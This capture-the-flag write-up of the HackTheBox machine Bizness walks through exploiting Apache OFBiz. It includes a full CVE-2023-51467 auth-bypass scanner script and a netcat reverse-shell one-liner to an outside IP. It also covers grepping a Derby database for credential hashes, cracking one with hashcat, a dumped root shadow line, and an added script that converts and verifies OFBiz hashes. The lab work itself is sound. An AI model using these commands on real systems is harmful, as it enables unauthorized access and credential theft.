Scan the target
nmap -sC -sV -T4 -Pn 10.10.11.252
The scan leaks the domain bizness.htb; add it to /etc/hosts
echo "10.10.11.252 bizness.htb" | sudo tee -a /etc/hosts
Then have a look at port 80
The front page on port 80 gives nothing away, so fuzz for directories (the fuzz is run against the HTTPS vhost)
dirsearch -u https://bizness.htb/
This looks like a back-office login page
It exposes quite a bit: the application is Apache OFBiz, and the bottom-right corner shows version 18.12. Search for known issues in that version.
First, confirm the Apache OFBiz instance is affected with this scanner (it only detects, it does not exploit)
GitHub - Chocapikk/CVE-2023-51467: Apache OfBiz Auth Bypass Scanner for CVE-2023-51467
exploit.py
```python
import os
import argparse
import requests
import concurrent.futures
from threading import Lock
from rich.console import Console
from typing import List, Optional
from urllib.parse import urlparse
from alive_progress import alive_bar
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Targets are usually self-signed, so silence the TLS warnings.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
console = Console()


class CVE_2023_51467:
    def __init__(self, urls: List[str], threads: int, output_file: str):
        self.urls = urls
        self.threads = threads
        self.output_file = output_file
        self.file_lock = Lock()

    def check_url(self, base_url: str) -> Optional[str]:
        # If no scheme was given, try http then https and keep the first that answers.
        parsed_url = urlparse(base_url)
        schemes = ["http", "https"] if not parsed_url.scheme else [parsed_url.scheme]
        for scheme in schemes:
            url = f"{scheme}://{parsed_url.netloc}{parsed_url.path}"
            if self.is_url_accessible(url):
                return url
        return None

    def is_url_accessible(self, url: str) -> bool:
        try:
            response = requests.head(url, verify=False, timeout=5, allow_redirects=True)
            return response.status_code < 500
        except requests.RequestException:
            return False

    def scan_url(self, base_url: str):
        target_url = self.check_url(base_url)
        if target_url:
            try:
                # The bypass: an empty USERNAME plus requirePasswordChange=Y makes the
                # login filter let the request through; a vulnerable server answers PONG.
                response = requests.get(
                    f"{target_url}/webtools/control/ping?USERNAME&PASSWORD=test&requirePasswordChange=Y",
                    verify=False,
                    timeout=10,
                    allow_redirects=True,
                )
                if response.status_code == 200 and "PONG" in response.text:
                    console.log(
                        f"Vulnerable URL found: {base_url}, Response: {response.text.strip()}"
                    )
                    vulnerable_url = f"{urlparse(target_url).scheme}://{urlparse(target_url).netloc}\n"
                    with self.file_lock:
                        with open(self.output_file, "a") as file:
                            file.write(vulnerable_url)
            except Exception as e:
                console.log(f"Error scanning {base_url}: {e}")

    def run(self):
        with alive_bar(len(self.urls), enrich_print=False) as bar:
            with concurrent.futures.ThreadPoolExecutor(
                max_workers=self.threads
            ) as executor:
                future_to_url = {
                    executor.submit(self.scan_url, url): url for url in self.urls
                }
                for _ in concurrent.futures.as_completed(future_to_url):
                    bar()


def main():
    script_name = os.path.basename(__file__)
    parser = argparse.ArgumentParser(
        description="CVE-2023-51467 Scanner: Scans URLs for a specific vulnerability associated with CVE-2023-51467.",
        epilog=f"Example usage:\n"
        f"  python {script_name} -u http://example.com\n"
        f"  python {script_name} -f urls.txt -o output.txt -t 50",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("-u", "--url", help="Single URL to send GET request to")
    parser.add_argument(
        "-f", "--file", help="File containing list of base URLs to scan"
    )
    parser.add_argument(
        "-o",
        "--output",
        default="output.txt",
        help="File to write vulnerable systems to",
    )
    parser.add_argument(
        "-t",
        "--threads",
        type=int,
        default=10,
        help="Number of concurrent threads to use",
    )
    args = parser.parse_args()
    urls = []
    if args.file:
        with open(args.file, "r") as file:
            urls = [line.strip() for line in file]
    elif args.url:
        urls.append(args.url)
    else:
        console.log("No URL or file provided")
        return
    scanner = CVE_2023_51467(urls, args.threads, args.output)
    scanner.run()


if __name__ == "__main__":
    main()
```
The scanner reports the site as vulnerable, so the next step uses a GUI exploitation tool shared by another researcher
From there a reverse shell can be fired straight away
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.22 4444 >/tmp/f
The reverse shell lands directly inside /opt, which is curious, so look at what the directories underneath hold
Go into /opt/ofbiz/runtime/data/derby; it contains an ofbiz folder whose seg0 subfolder is full of .dat files (the Derby database pages)
Grep straight for the string "password"; the files are binary, so tell grep to treat them as text (-a), recurse (-r), ignore case (-i), print line numbers (-n) and show only the match with a few words of context on either side (-o with the regex)
grep -arin -o -E '(\w+\W+){0,5}password(\W+\w+){0,5}' .
This turns up the hash
Looking at the hash, it is in OFBiz's HashCrypt layout: `$SHA$<salt>$<digest>`. "SHA" here is Java's name for SHA-1, the `$d$` segment is the salt (a single character d, not an iteration count), and the trailing part is the URL-safe Base64 encoding, without padding, of SHA-1(salt || password). Decode it first in CyberChef ("From Base64" with the URL-safe alphabet, then "To Hex")
With the digest as hex, and because the hash is salted, hashcat takes the line in the form hash:salt, so append :d. Mode 120 is sha1($salt.$pass), which matches how OFBiz builds the digest
hashcat -m 120 hash /home/ioi/rockyou.txt
The password cracks to monkeybizness. Reusing it for privilege escalation yields both the user and the root flag
root:$y$j9T$pJW9XfkWvA4ozHorBy1kA1$MMNByIaVvdq4YrIpvYDEIfckbiKog11HxKcxJkAZLcA:19709:0:99999:7:::
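The hash handling above (recognising the OFBiz format, turning it into a hashcat line and confirming a cracked candidate) as a worked example. This is an added script, not the original author's or the OFBiz project's code; it encodes the HashCrypt layout `$<algo>$<salt>$<URL-safe Base64 digest>` with digest = algo(salt || password), and the Derby page fragment and the `find_ofbiz_hashes` pattern are constructed for the example (a regex on the hash layout itself, as an assumed alternative to grepping for the word "password").

```python
import base64
import hashlib
import hmac
import re

# OFBiz HashCrypt stores credentials as "$<algo>$<salt>$<digest>", where digest is
# algo(salt || password) in URL-safe Base64 with the padding stripped. "SHA" is SHA-1.
_JAVA_TO_HASHLIB = {"SHA": "sha1", "SHA-256": "sha256"}
# hashcat modes that take "hexdigest:salt" and prepend the salt to the password.
_HASHCAT_MODE = {"SHA": 120, "SHA-256": 1420}


def ofbiz_hash(password: str, salt: str, hash_type: str = "SHA") -> str:
    """Rebuild an OFBiz-style hash string (used here to construct sample data)."""
    digest = hashlib.new(_JAVA_TO_HASHLIB[hash_type])
    digest.update(salt.encode("utf-8"))
    digest.update(password.encode("utf-8"))
    b64 = base64.urlsafe_b64encode(digest.digest()).decode("ascii").rstrip("=")
    return f"${hash_type}${salt}${b64}"


def parse_ofbiz_hash(stored: str):
    """Split "$SHA$d$..." into (hash_type, salt, raw digest bytes)."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] not in _JAVA_TO_HASHLIB:
        raise ValueError(f"not an OFBiz HashCrypt string: {stored!r}")
    hash_type, salt, b64 = parts[1], parts[2], parts[3]
    b64 += "=" * (-len(b64) % 4)  # restore the padding Java stripped
    return hash_type, salt, base64.urlsafe_b64decode(b64)


def to_hashcat_line(stored: str) -> str:
    """hashcat wants the raw digest as hex, then ':' and the salt (-m 120 / -m 1420)."""
    _, salt, digest = parse_ofbiz_hash(stored)
    return f"{digest.hex()}:{salt}"


def hashcat_mode(stored: str) -> int:
    return _HASHCAT_MODE[parse_ofbiz_hash(stored)[0]]


def check_candidate(stored: str, password: str) -> bool:
    """Verify a cracked password offline the same way OFBiz would."""
    hash_type, salt, digest = parse_ofbiz_hash(stored)
    h = hashlib.new(_JAVA_TO_HASHLIB[hash_type])
    h.update(salt.encode("utf-8"))
    h.update(password.encode("utf-8"))
    return hmac.compare_digest(h.digest(), digest)


# Assumed pattern: match the hash layout itself rather than the word "password",
# so rows whose column names were not kept next to the value are still found.
_HASH_RE = re.compile(rb"\$(SHA(?:-256)?)\$[A-Za-z0-9./]{1,16}\$[A-Za-z0-9_\-]{20,60}")


def find_ofbiz_hashes(blob: bytes):
    """Pull every OFBiz hash string out of an opaque byte blob (e.g. a Derby .dat page)."""
    return [m.group(0).decode("ascii") for m in _HASH_RE.finditer(blob)]


if __name__ == "__main__":
    # Constructed sample: a fake Derby page fragment holding one admin credential.
    sample = ofbiz_hash("monkeybizness", "d")
    derby_page = b"\x00\x12USER_LOGIN\x00admin\x00" + sample.encode() + b"\x00\x00END"
    for found in find_ofbiz_hashes(derby_page):
        print(found, "->", to_hashcat_line(found), "mode", hashcat_mode(found))
        print("candidate ok:", check_candidate(found, "monkeybizness"))
```

Feed the `to_hashcat_line` output to `hashcat -m <hashcat_mode(...)>`; `check_candidate` is the offline confirmation that the cracked word really reproduces the stored digest before trying it on the box.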
Originally published on the WeChat public account (Jiyou too beautiful): HTB-Bizness notes